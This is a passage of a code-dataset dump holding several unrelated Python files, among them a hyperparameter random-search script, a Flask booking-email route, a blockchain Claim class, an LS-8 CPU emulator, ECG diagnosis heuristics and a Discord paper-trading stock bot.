save_logging(dictionary, log_name):\n with open(log_name, 'w') as f:\n for key, value in dictionary.items():\n f.write('%s:%s\\n' % (key, value))\n\n\n# this open can calls the saved hyperparameters\ndef load_logging(filename):\n data = dict()\n with open(filename) as f:\n def is_float(input):\n try:\n num = float(input)\n except ValueError:\n return False\n return True\n\n for line in f.readlines():\n if ':' in line:\n key, value = line.strip().split(':', 1)\n if value.isdigit():\n data[key] = int(value)\n elif is_float(value):\n data[key] = float(value)\n elif value == 'None':\n data[key] = None\n else:\n data[key] = value\n else:\n pass # deal with bad lines of text here\n return data\n\n\n# this randomly select hyperparamters based on the given list of candidates\ndef get_random_hyperparameters(out_path):\n SET_BATCH_SIZE = [32, 64, 128] # mb_size\n\n SET_LAYERS = [1, 2, 3, 5] # number of layers\n SET_NODES = [50, 100, 200, 300] # number of nodes\n\n SET_ACTIVATION_FN = ['relu', 'elu', 'tanh'] # non-linear activation functions\n\n SET_ALPHA = [0.1, 0.5, 1.0, 3.0, 5.0] # alpha values -> log-likelihood loss\n SET_BETA = [0.1, 0.5, 1.0, 3.0, 5.0] # beta values -> ranking loss\n SET_GAMMA = [0.1, 0.5, 1.0, 3.0, 5.0] # gamma values -> calibration loss\n\n new_parser = {'mb_size': SET_BATCH_SIZE[np.random.randint(len(SET_BATCH_SIZE))],\n\n 'iteration': 50000,\n\n 'keep_prob': 0.6,\n 'lr_train': 1e-4,\n\n 'h_dim_shared': SET_NODES[np.random.randint(len(SET_NODES))],\n 'h_dim_CS': SET_NODES[np.random.randint(len(SET_NODES))],\n 'num_layers_shared': SET_LAYERS[np.random.randint(len(SET_LAYERS))],\n 'num_layers_CS': SET_LAYERS[np.random.randint(len(SET_LAYERS))],\n 'active_fn': SET_ACTIVATION_FN[np.random.randint(len(SET_ACTIVATION_FN))],\n\n 'alpha': 1.0, # default (set alpha = 1.0 and change beta and gamma)\n 'beta': SET_BETA[np.random.randint(len(SET_BETA))],\n 'gamma': 0, # default (no calibration loss)\n # 'alpha':SET_ALPHA[np.random.randint(len(SET_ALPHA))],\n # 'beta':SET_BETA[np.random.randint(len(SET_BETA))],\n # 'gamma':SET_GAMMA[np.random.randint(len(SET_GAMMA))],\n\n 'out_path': out_path}\n\n return new_parser # outputs the dictionary of the randomly-chosen hyperparamters\n\n##### MAIN SETTING\nOUT_ITERATION = 1\nRS_ITERATION = 20\n\ndata_mode = 'MZZ_200_5' # 'SYNTHETIC''METABRIC'\nseed = 1234\n\n##### IMPORT DATASET\n'''\n num_Category = typically, max event/censoring time * 1.2 (to make enough time horizon)\n num_Event = number of evetns i.e. len(nap.unique(label))-1\n max_length = maximum number of measurements\n x_dim = data dimension including delta (num_features)\n mask1, mask2 = used for cause-specific network (FCNet structure)\n\n EVAL_TIMES = set specific evaluation time horizons at which the validatoin performance is maximized. \n \t\t\t\t\t\t (This must be selected based on the dataset)\n'''\n\n\ndef run_experiment(data_mode):\n\n if data_mode == 'SYNTHETIC':\n (x_dim), (data, time, label), (mask1, mask2) = impt.import_dataset_SYNTHETIC(norm_mode='standard')\n EVAL_TIMES = [12, 24, 36]\n elif data_mode == 'METABRIC':\n (x_dim), (data, time, label), (mask1, mask2) = impt.import_dataset_METABRIC(norm_mode='standard')\n EVAL_TIMES = [144, 288, 432]\n elif data_mode[0:3] == 'MZZ':\n first_ = data_mode.find(\"_\")\n second_ = data_mode[first_+1:].find(\"_\") + first_ +1\n num_samples = data_mode[first_+1: second_]\n num_features = data_mode[second_+1:]\n (x_dim), (data, time, label), (mask1, mask2) = impt.import_mzz_SYNTHETIC(num_samples=num_samples, num_features = num_features, norm_mode='standard')\n EVAL_TIMES = [50, 100, int(max(time))]\n else:\n print('ERROR: DATA_MODE NOT FOUND !!!')\n\n DATA = (data, time, label)\n MASK = (mask1, mask2) # masks are required to calculate loss functions without for-loops.\n\n out_path = os.path.join('experiments', data_mode, 'results')\n #out_path = data_mode + '/results/'\n for itr in range(OUT_ITERATION):\n\n if not os.path.exists(out_path + '/itr_' + str(itr) + '/'):\n os.makedirs(out_path + '/itr_' + str(itr) + '/')\n\n max_valid = 0.\n max_valid_list = []\n log_name = out_path + '/itr_' + str(itr) + '/hyperparameters_log.txt'\n\n for r_itr in range(RS_ITERATION):\n print('OUTER_ITERATION: ' + str(itr))\n print('Random search... itr: ' + str(r_itr))\n new_parser = get_random_hyperparameters(out_path)\n print(new_parser)\n\n # get validation performance given the hyper - parameters\n tmp_max = get_main.get_valid_performance(DATA, MASK, new_parser, itr, EVAL_TIMES, MAX_VALUE=max_valid)\n if tmp_max > max_valid:\n max_valid = tmp_max\n max_parser = new_parser\n save_logging(max_parser, log_name) # save the hyperparameters if this provides the maximum validation performance\n print('Current best: ' + str(max_valid))\n max_valid_list.append(max_valid)\n\n\n result_fpath = os.path.join(out_path, 'itr_' + str(itr), 'performance.txt' )\n with open(result_fpath, 'w') as f:\n f.write('Max:{}\\n'.format( np.max(max_valid) ) )\n f.write('Std:{}\\n'.format( np.std(max_valid_list)))\n print(np.max(max_valid))\n print(np.std(max_valid_list))\n\n\nif __name__ == '__main__':\n\n data_mode_list = ['MZZ_200_3', 'MZZ_200_5', 'MZZ_200_10',\n 'MZZ_500_3', 'MZZ_500_5', 'MZZ_500_10',\n 'MZZ_750_3', 'MZZ_750_5', 'MZZ_750_10',\n 'MZZ_1000_3', 'MZZ_1000_5', 'MZZ_1000_10',\n 'MZZ_2000_3', 'MZZ_2000_5', 'MZZ_2000_10',\n 'MZZ_5000_3', 'MZZ_5000_5', 'MZZ_5000_10'\n ]\n\n for data_mode in data_mode_list:\n run_experiment(data_mode)\n","sub_path":"main_RandomSearch.py","file_name":"main_RandomSearch.py","file_ext":"py","file_size_in_byte":7266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"112917495","text":"from flask import Blueprint, render_template, redirect, url_for, request, flash\nfrom pymongo import MongoClient\nfrom ssl_decorators import no_ssl_required\nfrom smtplib import SMTP\nfrom email.mime.text import MIMEText\n\nblueprint = Blueprint('book_event', __name__)\n\n@blueprint.route('/bookevent', methods=['GET','POST'])\n@no_ssl_required\ndef view():\n if request.method == 'POST':\n book_request = \"Name: \" + request.form['name'] + \"\\n\"\n book_request += \"Phone number: \" + request.form['phone'] + \"\\n\"\n book_request += \"Reason: \" + request.form['reason'] + \"\\n\"\n book_request += \"Location: \" + request.form['location'] + \"\\n\"\n book_request += \"Secrecy level: \" + request.form['secrecylevel'] + \"\\n\"\n book_request += \"Number of people: \" + request.form['numpeople'] + \"\\n\"\n book_request += \"Budget: \" + request.form['budget']\n\n msg = MIMEText(book_request)\n msg['Subject'] = \"Booking request\"\n msg['From'] = \"Off The Grid booking\"\n msg['To'] = \"kwyatt187@gmail.com\"\n \n s = SMTP('localhost')\n s.sendmail(\"Off_The_Grid_booking@offthegridadvertising.com\", [\"kwyatt187@gmail.com\"], msg.as_string())\n s.quit()\n flash('Booking request sent')\n return redirect(url_for('book_event.view'))\n else:\n db = MongoClient().offTheGrid\n locations = db.locations.find().sort([(\"name\" , 1)])\n return render_template('bookevent.html', locations=locations)\n","sub_path":"views/book_event.py","file_name":"book_event.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"178158525","text":"import os\nimport pickle\n\ndef read(path):\n data = {}\n if os.path.exists(path):\n with open(path, 'rb') as f:\n data = pickle.load(f)\n return data\n\ndef save(path,data):\n with open(path, 'wb') as f:\n pickle.dump(data, f, True)\n\n","sub_path":"pkl.py","file_name":"pkl.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"554257540","text":"#Types.\nfrom typing import Dict, List, Any\n\n#Transaction classs.\nfrom PythonTests.Classes.Transactions.Transaction import Transaction\n\n#BLS lib.\nimport blspy\n\n#Blake2b standard function.\nfrom hashlib import blake2b\n\n#Claim class.\nclass Claim(Transaction):\n #Constructor.\n def __init__(\n self,\n inputs: List[bytes],\n output: bytes,\n signature: bytes = bytes(96)\n ) -> None:\n self.inputs: List[bytes] = inputs\n self.output: bytes = output\n self.amount: int = 0\n\n self.signature: bytes = signature\n self.hash = blake2b(b'\\1' + self.signature, digest_size=48).digest()\n\n self.verified: bool = False\n\n #Transaction -> Claim. Satisifes static typing requirements.\n @staticmethod\n def fromTransaction(\n tx: Transaction\n ) -> Any:\n return tx\n\n #Sign.\n def sign(\n self,\n privKeys: List[blspy.PrivateKey]\n ) -> None:\n signatures: List[blspy.Signature] = [\n privKeys[0].sign(b'\\1' + self.inputs[0] + self.output)\n ]\n\n for i in range(1, len(self.inputs)):\n signatures.append(privKeys[i].sign(b'\\1' + self.inputs[i] + self.output))\n\n self.signature = blspy.Signature.aggregate(signatures).serialize()\n self.hash = blake2b(b'\\1' + self.signature, digest_size=48).digest()\n\n #Serialize.\n def serialize(\n self\n ) -> bytes:\n result: bytes = len(self.inputs).to_bytes(1, \"big\")\n for txInput in self.inputs:\n result += txInput\n result += self.output + self.signature\n return result\n\n #Claim -> JSON.\n def toJSON(\n self\n ) -> Dict[str, Any]:\n if self.amount == 0:\n raise Exception(\"Python tests didn't set this Claim's value.\")\n\n result: Dict[str, Any] = {\n \"descendant\": \"Claim\",\n \"inputs\": [],\n \"outputs\": [{\n \"key\": self.output.hex().upper(),\n \"amount\": str(self.amount)\n }],\n\n \"signature\": self.signature.hex().upper(),\n \"hash\": self.hash.hex().upper()\n }\n for txInput in self.inputs:\n result[\"inputs\"].append({\n \"hash\": txInput.hex().upper()\n })\n return result\n\n #Claim -> JSON with verified field.\n def toVector(\n self,\n ) -> Dict[str, Any]:\n result = self.toJSON()\n result[\"verified\"] = self.verified\n return result\n\n #JSON -> Claim.\n @staticmethod\n def fromJSON(\n json: Dict[str, Any]\n ) -> Any:\n inputs: List[bytes] = []\n for txInput in json[\"inputs\"]:\n inputs.append(bytes.fromhex(txInput[\"hash\"]))\n\n result: Claim = Claim(\n inputs,\n bytes.fromhex(json[\"outputs\"][0][\"key\"]),\n bytes.fromhex(json[\"signature\"])\n )\n result.amount = int(json[\"outputs\"][0][\"amount\"])\n if json[\"verified\"]:\n result.verified = True\n return result\n","sub_path":"PythonTests/Classes/Transactions/Claim.py","file_name":"Claim.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"448130786","text":"# coding: utf-8\n\nimport os.path as op\nimport numpy as np\nimport pandas as pd\nfrom pandas.api.types import CategoricalDtype as cdtype\n\nRENAME_COLS = dict(PATNO='PARTICIPANT',\n EVENT_ID='VISIT')\nASSIGN_COLS = dict(PAG_NAME='DATSCAN',\n VISIT_DATE=np.nan)\nRETAIN_COLS = ['PARTICIPANT', 'PAG_NAME', 'VISIT',\n 'VISIT_DATE', 'TEST', 'SCORE']\n\n\ndef get_data(fpath):\n \"\"\"\n Gets DaTscan data for PPMI subjects\n\n Parameters\n ----------\n fname : str\n Filepath to directory containing DaTScan_Analysis.csv file\n\n Returns\n -------\n data : pandas.core.frame.DataFrame\n DaTScan data\n \"\"\"\n\n visits = ['SC', 'BL', 'V01', 'V02', 'V03', 'V04', 'V05', 'V06', 'V07',\n 'V08', 'V09', 'V10', 'V11', 'V12', 'V13', 'V14', 'V15']\n dtype = dict(PATNO=str,\n EVENT_ID=cdtype(visits, ordered=True))\n\n fname = op.join(fpath, 'DATScan_Analysis.csv')\n data = pd.read_csv(fname, dtype=dtype)\n\n # melt into tidy DataFrame\n data = pd.melt(data.rename(columns=RENAME_COLS),\n id_vars=RENAME_COLS.values(),\n var_name='TEST', value_name='SCORE')\n data = data.dropna(axis=0, subset=['SCORE'])\n data = data.assign(**ASSIGN_COLS)[RETAIN_COLS]\n\n return data\n","sub_path":"ppmi/datasets/datscan.py","file_name":"datscan.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"159198173","text":"\"\"\"CPU functionality.\"\"\"\n\nimport sys\n\n\nclass CPU:\n \"\"\"Main CPU class.\"\"\"\n\n def __init__(self):\n \"\"\"Construct a new CPU.\"\"\"\n self.ram = [0] * 256\n self.reg = [0] * 8\n self.reg[7] = 0xF4 # set the last reg to the sp\n self.pc = 0\n\n # op codes and handler\n self.handler = {\n 0b10100000: self.handle_ADD,\n 0b01010000: self.handle_CALL,\n 0b00000001: self.handle_HLT,\n 0b10000010: self.handle_LDI,\n 0b10100010: self.handle_MUL,\n 0b01000110: self.handle_POP,\n 0b01000111: self.handle_PRN,\n 0b01000101: self.handle_PUSH,\n 0b00010001: self.handle_RET\n }\n\n def load(self, file):\n \"\"\"Load a program into memory.\"\"\"\n\n address = 0\n\n with open(file) as f:\n lines = f.readlines()\n lines = [\n line for line in lines if line.startswith('0') or line.startswith('1')\n ]\n program = [int(line[:8], 2) for line in lines]\n\n for instruction in program:\n self.ram[address] = instruction\n address += 1\n\n def handle_instructions(self, op, reg_a, reg_b):\n \"\"\"CU operations.\"\"\"\n try:\n self.handler[op](reg_a, reg_b)\n except KeyError:\n raise Exception(\"No such op code\")\n\n def handle_ADD(self, reg_a, reg_b):\n self.reg[reg_a] += self.reg[reg_b]\n self.pc += 3\n \n def handle_CALL(self, reg_a, reg_b):\n self.reg[7] -= 1\n self.ram_write(self.pc + 2, self.reg[7])\n self.pc = self.reg[reg_a]\n\n def handle_HLT(self, reg_a, reg_b):\n self.pc += 1\n self.running = False\n\n def handle_LDI(self, reg_a, reg_b):\n self.reg[reg_a] = reg_b\n self.pc += 3\n\n def handle_MUL(self, reg_a, reg_b):\n self.reg[reg_a] = (self.reg[reg_a] * self.reg[reg_b])\n self.pc += 3\n\n def handle_POP(self, reg_a, reg_b):\n self.reg[reg_a] = self.ram_read(self.reg[7])\n self.reg[7] += 1\n self.pc += 2\n return self.reg[reg_a]\n\n def handle_PRN(self, reg_a, reg_b):\n print(self.reg[reg_a])\n self.pc += 2\n\n def handle_PUSH(self, reg_a, reg_b):\n self.reg[7] -= 1\n self.ram_write(self.reg[reg_a], self.reg[7])\n self.pc += 2\n\n def handle_RET(self, reg_a, reg_b):\n self.pc = self.ram_read(self.reg[7])\n self.reg[7] += 1\n \n\n def ram_read(self, address):\n return self.ram[address]\n\n def ram_write(self, value, address):\n self.ram[address] = value\n\n def trace(self):\n \"\"\"\n Handy function to print out the CPU state. You might want to call this\n from run() if you need help debugging.\n \"\"\"\n\n print(f\"TRACE: %02X | %02X %02X %02X |\" % (\n self.pc,\n # self.fl,\n # self.ie,\n self.ram_read(self.pc),\n self.ram_read(self.pc + 1),\n self.ram_read(self.pc + 2)\n ), end='')\n\n for i in range(8):\n print(\" %02X\" % self.reg[i], end='')\n\n print()\n\n def run(self):\n \"\"\"Run the CPU.\"\"\"\n\n # set exit condition\n self.running = True\n\n # while loop\n while self.running:\n\n IR = self.ram_read(self.pc)\n operand_a = self.ram_read(self.pc + 1)\n operand_b = self.ram_read(self.pc + 2)\n\n self.handle_instructions(IR, operand_a, operand_b)\n","sub_path":"ls8/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"156013537","text":"#On my honor,as an Aggie, I have neither given nor received unauthorized aid on this academic work. An Aggie does not\r\n#lie, cheat or steal, or tolerate those who do\r\n\r\n\r\nfrom scipy.signal import find_peaks\r\n\r\n# this function diagnoses AV block first degree\r\ndef AV_firstdegree(PRinterval):\r\n # if there are no corresponding PR intervals for calculations, AV first degree is not the diagnosis\r\n if PRinterval == 0:\r\n value = False\r\n\r\n # AV first degree is diagnosed through a PR interval greater than .2 sec\r\n # the average of the PR intervals are used to determine if the interval exceeds .2 sec\r\n else:\r\n PRinterval = sum(PRinterval)/len(PRinterval)\r\n if PRinterval > .2:\r\n value = True\r\n else:\r\n value = False\r\n return value\r\n\r\n# this function diagnoses AV block second degree\r\ndef AV_seconddegree(PPinterval,RRinterval):\r\n # AV block second degree is diagnosed when there are missing QRS complexes\r\n\r\n # if there are no P waves or R waves diagnosis should be false\r\n if len(PPinterval) == 0 or len(RRinterval) == 0:\r\n diagnosis = False\r\n\r\n # if there are QRS complexes missing, the number of P intervals should be considerably bigger\r\n elif (len(PPinterval) - len(RRinterval)) > 2:\r\n diagnosis = True\r\n else:\r\n diagnosis = False\r\n return diagnosis\r\n\r\n# this function diagnoses tachycardia\r\ndef sinus_tachycardia (bpm):\r\n # tachycardia is diagnosed when the heart rate is over 100 bpm\r\n if bpm > 100:\r\n diagnosis = True\r\n else:\r\n diagnosis = False\r\n return diagnosis\r\n\r\n# this function diagnoses bradycardia\r\ndef sinus_bradycardia (bpm):\r\n # bradycardia is diagnosed when the heart rate is less than 60 bpm\r\n if bpm < 60:\r\n diagnosis = True\r\n else:\r\n diagnosis = False\r\n return diagnosis\r\n\r\n# this function diagnoses arrythmia\r\ndef arrythmia(PPinterval,RRinterval):\r\n # if any value of the RR interval is greater than 1, the diagnosis is false\r\n x = 0\r\n r = []\r\n # while loop looks for the values over 1 and append them to the r list\r\n while x != len(RRinterval):\r\n y = RRinterval[x]\r\n if y > 1:\r\n r.append(y)\r\n x += 1\r\n else:\r\n x += 1\r\n if len(r) > 0:\r\n diagnosis = False\r\n else:\r\n # if there are no PP intervals or RR interval, the diagnosis is false\r\n if len(PPinterval)==0 or len(RRinterval)==0:\r\n diagnosis = False\r\n else:\r\n # one way of diagnosing is finding the difference between the greatest PP interval and the smallest PP interval\r\n # the interval must be greater than .16\r\n max_interval = max(PPinterval)\r\n min_interval = min(PPinterval)\r\n PPinterval = max_interval - min_interval\r\n\r\n # another way of diagnosing is finding the difference between the greatest RR interval and the smallest RR interval\r\n # the interval must be greater than .16\r\n max_interval1 = max(RRinterval)\r\n min_interval1 = min(RRinterval)\r\n RRinterval = max_interval1 - min_interval1\r\n\r\n #if any of the two intervals are greater than .16, the diagnosis is true\r\n if PPinterval > .16 or RRinterval > .16:\r\n diagnosis = True\r\n else:\r\n diagnosis = False\r\n return diagnosis\r\n\r\n# this function diagnoses bundle branch block\r\ndef bundle_branch(QRS_interval,voltage):\r\n # to diagnose bundle branch block, the length of the QRS complex must be greater than .12 sec\r\n # the average of the QRS complexes is used to determine if it is greater than .12 sec\r\n QRS_interval = sum(QRS_interval)/len(QRS_interval)\r\n P_peaks, _ = find_peaks(voltage, height=(.25, .4))\r\n\r\n # if there are no P waves, diagnosis is false\r\n if len(P_peaks) == 0:\r\n value = False\r\n #if the average is greater than .12, the diagnosis is true\r\n elif QRS_interval>.120:\r\n value = True\r\n else:\r\n value = False\r\n return value\r\n\r\ndef atrial_fibrillation(voltage):\r\n # findpeaks is used to first find the P waves\r\n P_peaks, _ = find_peaks(voltage, height=(.25, .4))\r\n # when diagnosing atrial fibrillation, there are usually no P waves\r\n if len(P_peaks) == 0:\r\n diagnosis = True\r\n else:\r\n diagnosis = False\r\n return diagnosis","sub_path":"Diseases.py","file_name":"Diseases.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"208396287","text":"import discord, os, operator, threading, time\nfrom discord.ext import commands, tasks\nfrom ledger import Ledger\nfrom stocks import (\n YahooFinance,\n PolygonRest,\n)\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport pandas as pd\nfrom datetime import datetime\nfrom config import TOKEN\n\nledger = Ledger('data.json')\nstocks = PolygonRest()\nintents = discord.Intents.default()\nintents.members = True\ncommand_prefix = \"!\"\nbot = commands.Bot(command_prefix=command_prefix, intents=intents)\nbot.remove_command('help')\nembed_color = 0x00ff00\n\ndef rnd(f):\n return round(f, 2)\n\ndef sdate():\n return str(datetime.now())[:19]\n\ndef add_embed(title=None, description=None, fields=None, inline=False, ctx=None,\n author=None, image=None, footer=None, timestamp=None, color=embed_color):\n embed = discord.Embed(\n title=title,\n description=description,\n color=color,\n )\n if fields != None:\n for name, value in fields:\n embed.add_field(\n name=name,\n value=value,\n inline=inline,\n )\n if author != None:\n embed.set_author(name=author.name, icon_url=author.avatar_url)\n if image != None:\n embed.set_image(url=image)\n if footer != None:\n embed.set_footer(text=footer)\n if timestamp != None:\n embed.set_timestamp(timestamp)\n return embed\n\n@bot.command()\nasync def help(ctx):\n fields = [\n ('!add', 'Sign up for StocksBot'),\n ('!buy (type) (symbol) (amount)', 'To purchase shares ex. !buy cash AAPL 1000'),\n ('!sell (type) (symbol) (amount)', 'To sell shares ex. !sell qty TSLA 1000'),\n ('!liquidate', 'To liquidate all assets'),\n ('!portfolio (id)', 'To view all your assets'),\n ('!stock (symbol)', 'To view the stock trend of a specific company ex. !stock AMZN'),\n ('!lookup (company name)', 'To get the information of a specific company ex. !lookup Starbucks'),\n ]\n embed = add_embed('Help', description='Descriptions for all the commmands', fields=fields)\n await ctx.send(embed=embed)\n\n@bot.command()\nasync def echo(ctx, *, content:str):\n print(ctx.author)\n await ctx.send(content)\n\n\n# @bot.command()\n# async def add(ctx):\n# id = ctx.author.id\n# name = ctx.author.name\n# if (ledger.contains(id)):\n# embed = add_embed('StocksBot', 'Error: Already registered with StocksBot!', color=0xFF0000, author=ctx.author)\n# else:\n# ledger.add_user(id, name)\n# embed = add_embed('StocksBot', 'You have been added to StocksBot!', author=ctx.author)\n# await ctx.send(embed=embed)\n\n@bot.command()\nasync def buy(ctx, type:str, symbol:str, amount:str):\n symbol = symbol.upper()\n id = str(ctx.author.id)\n name = ctx.author.name\n try:\n price = stocks.latest_price(symbol)\n if price == None:\n raise\n except:\n embed = add_embed(f'\"{symbol}\" couldn\\'t be found', author=ctx.author)\n await ctx.send(embed=embed)\n return\n if amount == 'all':\n qty = None\n elif type == 'cash':\n qty = float(amount)/price\n elif type == 'qty':\n qty = float(amount)\n else:\n await ctx.send(f'Invalid Command {ctx.author.mention}')\n\n if qty != None and qty < .1:\n embed = add_embed('Error in Transaction', f'{ctx.author.mention} need to buy more than .1 shares', author=ctx.author)\n await ctx.send(embed=embed)\n return\n pqty = ledger.enter_position(str(id), 'long', symbol, price, qty)\n if pqty == False:\n embed = add_embed('Error in Transaction', f'{ctx.author.mention} error processing transaction! (Maybe Overbought)', author=ctx.author)\n await ctx.send(embed=embed)\n else:\n fields = [\n ('Share Price', f'${rnd(price)}'),\n ('Quantity', f'{rnd(pqty)} shares'),\n ('Worth', f'${rnd(pqty * price)}')\n ]\n footer = f'Transaction at {sdate()}'\n embed = add_embed(f'Bought {symbol}', f'Remaining Balance: ${rnd(ledger.get_balance(id))}' , fields=fields, author=ctx.author, inline=True, footer=footer)\n await ctx.send(embed=embed)\n\n@bot.command()\nasync def sell(ctx, type:str, symbol:str, amount:str):\n symbol = symbol.upper()\n id = str(ctx.author.id)\n name = ctx.author.name\n price = stocks.latest_price(symbol)\n try:\n price = stocks.latest_price(symbol)\n if price == None:\n raise\n except:\n embed = add_embed(f'\"{symbol}\" couldn\\'t be found', author=ctx.author)\n await ctx.send(embed=embed)\n return\n if amount == 'all':\n qty = None\n elif type == 'cash':\n qty = float(amount)/price\n elif type == 'qty':\n qty = float(amount)\n else:\n await ctx.send(f'Invalid Command {ctx.author.mention}')\n\n if qty != None and qty < .1:\n embed = add_embed('Error in Transaction', f'{ctx.author.mention} need to sell more than .1 shares', author=ctx.author)\n await ctx.send(embed=embed)\n return\n pqty = ledger.exit_position(id, 'sell', symbol, price, qty)\n if pqty == False:\n embed = add_embed('Error in Transaction', f'{ctx.author.mention} error processing transaction! (Maybe Oversold)', author=ctx.author)\n await ctx.send(embed=embed)\n else:\n fields = [\n ('Share Price', f'${rnd(price)}'),\n ('Quantity', f'{rnd(pqty)} shares'),\n ('Worth', f'${rnd(pqty * price)}')\n ]\n footer = f'Transaction at {sdate()}'\n embed = add_embed(f'Sold {symbol}', f'Remaining Balance: ${rnd(ledger.get_balance(id))}', fields=fields, author=ctx.author, inline=True, footer=footer)\n await ctx.send(embed=embed)\n\n\n@bot.command()\nasync def stock(ctx, symbol:str):\n symbol = symbol.upper()\n try:\n price = stocks.latest_price(symbol)\n except:\n embed = add_embed(f'Could\\'t find information for \"{symbol}\"', 'check spelling and symbol!')\n await ctx.send(embed=embed)\n return\n open, high, low = stocks.get_stats(symbol)\n trend = rnd(price-open)\n trend_perc = rnd((price-open)/open*100)\n if trend > 0:\n trend = f'+${trend}'\n trend_perc = f'+{trend_perc}%'\n else:\n trend = f'-${abs(trend)}'\n trend_perc = f'-{abs(trend_perc)}%'\n fields = [\n ('Current Price', f'${price}'),\n ('Open Price', f'${open}'),\n ('High Price', f'${high}'),\n ('Low Price', f'${low}'),\n ('Trend Today', trend),\n ('Trend Today %', trend_perc),\n ]\n o, h, l, c = stocks.get_aggregate(symbol)\n layout = go.Layout(\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)',\n width=1200,\n height=800,\n xaxis=go.layout.XAxis(\n showticklabels=False\n ),\n yaxis=go.layout.YAxis(\n color=\"white\"\n )\n )\n fig = go.Figure(data=[go.Candlestick(open=o, high=h, low=l, close=c)], layout=layout)\n fig.update_layout(xaxis_rangeslider_visible=False)\n fig.write_image(\"images/\" + symbol + \".png\")\n file = discord.File(\"images/\" + symbol + \".png\", filename='image.png')\n embed = add_embed(title=symbol, description=f'Stats as of ({sdate()})', fields=fields, author=ctx.author, inline=True, image='attachment://image.png')\n await ctx.send(file=file, embed=embed)\n os.remove('images/' + symbol + '.png')\n\n@bot.command()\nasync def liquidate(ctx):\n id = str(ctx.author.id)\n holdings = ledger.get_holdings(id)\n fields = []\n for symbol, qty in holdings:\n price = stocks.latest_price(symbol)\n ledger.exit_position(id, 'sell', symbol, price, qty)\n value = f'''\n {rnd(qty)} Shares\n ${rnd(qty * price)}\n '''\n fields.append((symbol, value))\n embed = add_embed(f'Portfolio Liquidated', fields=fields, author=ctx.author, inline=True)\n await ctx.send(embed=embed)\n\n@tasks.loop(seconds=30)\nasync def leaderboard():\n ports, i, fields = ledger.get_all_owned(), 1, []\n worths = {}\n for id in ports:\n worth = ledger.get_balance(id)\n for sym, qty in ports[id]:\n worth += qty * stocks.latest_price(sym)\n worths[id] = worth\n sorted_worths = sorted(worths.items(), key=operator.itemgetter(1))\n sorted_worths.reverse()\n for id, bal in sorted_worths:\n if i > 10: break\n user = await bot.fetch_user(int(id))\n fields.append((f'{i}: {user.name}', f'Net Worth: ${rnd(bal)}'))\n i += 1\n embed = add_embed(title='Leaderboard', fields=fields)\n for guild in bot.guilds:\n channel = discord.utils.get(guild.channels, name=\"leaderboard\")\n if channel == None:\n channel = await guild.create_text_channel('leaderboard')\n message_list = await channel.history(limit=1).flatten()\n if (len(message_list) == 0):\n await channel.send(embed=embed)\n else:\n try:\n await message_list[0].edit(embed=embed)\n except:\n await channel.purge(limit=100)\n await channel.send(embed=embed)\n\nasync def add_all():\n await bot.wait_until_ready()\n for user in bot.users:\n if not ledger.contains(user.id) and not user.bot:\n ledger.add_user(user.id, user.name)\n\nadd_all()\nleaderboard.start()\n\n@bot.command()\nasync def portfolio(ctx):\n after = ctx.message.content.lower().split(\"portfolio\")[1]\n if (len(ctx.message.mentions) > 0):\n author = ctx.message.mentions[0]\n elif (len(after) > 2 and ctx.guild.get_member(int(after.split(' ')[1])) != None):\n author = ctx.guild.get_member(int(after.split(' ')[1]))\n else:\n author = ctx.author\n id = str(author.id)\n port = ledger.portfolio(id)\n fields = []\n cash_balance = ledger.get_balance(id)\n total_worth = cash_balance\n for sym, qty, ptype, price in port:\n current_price = stocks.latest_price(sym)\n if ptype == 'long':\n profit = rnd((current_price-price)*qty)\n profit_perc = rnd((current_price-price)/price*100)\n total_worth += current_price * qty\n else:\n total_worth += qty * (2 * price - current_price)\n profit = rnd((price-current_price)*qty)\n profit_perc = rnd((price-current_price)/price*100)\n value = f'''\n Shares: {rnd(qty)}\n Position: {ptype}\n Worth: ${rnd(current_price*qty)}‎‎‎‎‎‎‎‎‏‏‎‎‏‏‎‏‏‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎\n Profit: {profit}$\n Profit %: {profit_perc}%‏‏‎\n\n '''\n fields.append((f'{sym}', value))\n total_stats = f'''\n Net Worth: ${rnd(total_worth)}\n Cash Balance: ${rnd(cash_balance)}\n Total Profit:\n ${rnd(total_worth - 10e3)} | {rnd((total_worth - 10e3)/10e3 * 100)}%\n '''\n embed = add_embed(f'Portfolio', total_stats, fields=fields, inline=True, author=author)\n await ctx.send(embed=embed)\n\n\n@bot.command()\nasync def lookup(ctx):\n query = ctx.message.content.lower().split(\"lookup\")[1][1:]\n symbol = stocks.lookup(query)\n data = stocks.get_info(symbol)\n if data == False:\n embed = add_embed(f'Couldn\\'t find information for \"{query}\"', 'Make sure symbol exists!')\n await ctx.send(embed=embed)\n return\n fields = [\n ('Symbol', data['symbol']),\n ('Maket Cap', f'${data[\"marketcap\"]}'),\n ('Employees', data['employees']),\n ('Sector', data['sector']),\n ('Industry', data['industry']),\n ('Website', data['url'])\n ]\n embed = add_embed(data['name'], 'Basic Infomation', fields=fields, image=data['logo'], inline=True)\n await ctx.send(embed=embed)\n\n\nbot.run(TOKEN)\n","sub_path":"events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":11947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} 